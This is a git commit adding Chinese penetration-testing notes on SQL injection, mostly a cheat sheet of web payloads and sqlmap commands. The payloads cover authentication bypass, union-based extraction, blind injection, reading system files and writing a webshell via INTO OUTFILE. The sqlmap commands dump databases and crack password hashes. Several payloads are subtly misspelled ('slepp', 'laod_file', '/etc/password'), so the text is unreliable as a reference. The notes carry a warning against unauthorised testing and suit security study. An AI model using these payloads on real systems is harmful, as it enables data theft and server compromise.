📝 Add sql inject

waterbang · waterbang · commit 4c6735d6e17c · 2024-05-01T19:58:03.000+08:00
diff --git a/.DS_Store b/.DS_Store
diff --git a/README.md b/README.md
@@ -1,3 +1,8 @@
 ## 渗透测试笔记
 
+> 警告：不要对未经授权系统进行渗透测试
+
 ### [fsciety](./fsciety/README.md)
+
+### [SQL注入](./sql/README.md)
+
diff --git a/fsciety/README.md b/fsciety/README.md
@@ -1,6 +1,8 @@
 ## fsciety
 
-### install
+[doc](https://fsociety.dev/)
+
+### Install from docker
 
 ```bash
 docker pull fsocietyteam/fsociety
@@ -16,5 +18,6 @@ docker ps -a # 找到容器
 再次启动
 
 ```bash
+docker start [container_name]
 docker attach [container_name]
-```
+```
diff --git a/sql/README.md b/sql/README.md
@@ -0,0 +1,5 @@
+## SQL 注入
+
+[sqlmap](./sqlmap.md)
+
+[手工注入](./sqlmap.md)
diff --git a/sql/manual.md b/sql/manual.md
@@ -0,0 +1,74 @@
+## 手工注入
+
+### 大佬文章推荐
+
+[肖洋肖恩、](https://www.cnblogs.com/-mo-/p/12730682.html)
+
+## 常用的 playload
+
+### 注释
+
+```sql
+or 1=1--+
+'or 1=1--+
+"or 1=1--+
+)or 1=1--+
+')or 1=1--+
+") or 1=1--+
+"))or 1=1--+
+--+ 可以用#替换，url 提交过程中 Url 编码后的#为%23
+--+ SELECT * FROM users WHERE id=''or 1=1--+' LIMIT 0,1
+```
+
+### 联合注入
+
+判断字段数目,`?id=1' order by 1 --+ `此时页面正常，
+继续换更大的数字测试`?id=1' order by 10 --+` 此时页面返回错误，
+更换小的数字测试`?id=1' order by 5 --+ `此时页面依然报错，
+继续缩小数值测试`?id=1' order by 3 --+ `此时页面返回正常，
+更换大的数字测试`?id=1' order by 4 --+` 此时页面返回错误，3 正常，4 错误，说明字段数目就是 3
+
+```sql
+?id=1' order by 4--+
+```
+
+拿到数据库名
+
+```sql
+?id=0' union select 1,2,3,database()--+
+```
+
+### 报错爆出信息
+
+通过 id=-1 一个负数不存在的 id 值来触发报错
+
+```sql
+id=-1' UNION SELECT 1,2,3
+```
+
+通过 or 1=1 语句来触发报错
+
+```sql
+id=1' or 1=1 UNION SELECT 1,2,3
+```
+
+### 基于时间的盲注
+
+```sql
+1' and slepp(5) --'
+--+ select first_name, last_name from dvwa.users where user_id='1' and sleep(5) --'
+```
+
+### 读取文件
+
+```sql
+=1' and 1=2 union select laod_file('/etc/password') #
+```
+
+### 文件写入
+
+文件写入配合菜刀提权。
+
+```sql
+=1 and 1=2 union select '菜刀木马内容' into outfile '文件目录+文件名'
+```
diff --git a/sql/sqlmap.md b/sql/sqlmap.md
@@ -0,0 +1,69 @@
+## sqlmap
+
+[github](https://github.com/sqlmapproject/sqlmap)
+[doc](https://github.com/sqlmapproject/sqlmap/wiki/Usage)
+
+### 起手式
+
+使用默认行为检测 sql 注入，这也能判断这个点是否是注入点,默认情况下，sqlmap 测试它支持的所有类型/技术。
+
+```bash
+python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" --batch
+```
+
+爆库， `--dbs` 会枚举出所以数据库
+
+```bash
+python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" --dbs
+```
+
+### 查看数据
+
+- 查看当前数据库
+
+```bash
+python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" --current-db
+```
+
+- 查看数据库表
+
+```bash
+python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" -D my_db --tables“
+```
+
+- 枚举数据库表列
+
+```bash
+python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" -D my_db -T `This_key` --columns
+```
+
+- 查看列数据
+
+```bash
+python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" -D my_db -T `This_key` -C `k0y` --dump
+```
+
+### 账号密码
+
+检索正在从 Web 应用程序对后端 DBMS 有效执行查询的数据库管理系统用户
+
+```bash
+python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" --current-user
+```
+
+列出并破解数据库管理系统用户密码哈希值
+
+```bash
+python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" --passwords
+```
+
+### 绕过 CSRF 保护
+
+现在有很多网站通过在表单中添加值为随机生成的 token 的隐藏字段来防止 CSRF 攻击，sqlmap 会自动识别出这种保护方式并绕过。但自动识别有可能失效，此时就要用到这两个参数。
+
+- `–csrf-token`用于指定包含 token 的隐藏字段名，若这个字段名不是常见的防止 CSRF 攻击的字段名 sqlmap 可能不能自动识别出，需要手动指定。如 Django 中该字段名为“csrfmiddlewaretoken”，明显与 CSRF 攻击有关。
+- `–csrf-url`用于从任意的 URL 中回收 token 值。若最初有漏洞的目标 URL 中没有包含 token 值而又要求在其他地址提取 token 值时该参数就很有用。
+
+### 强制使用 SSL
+
+指定 `–force-ssl`
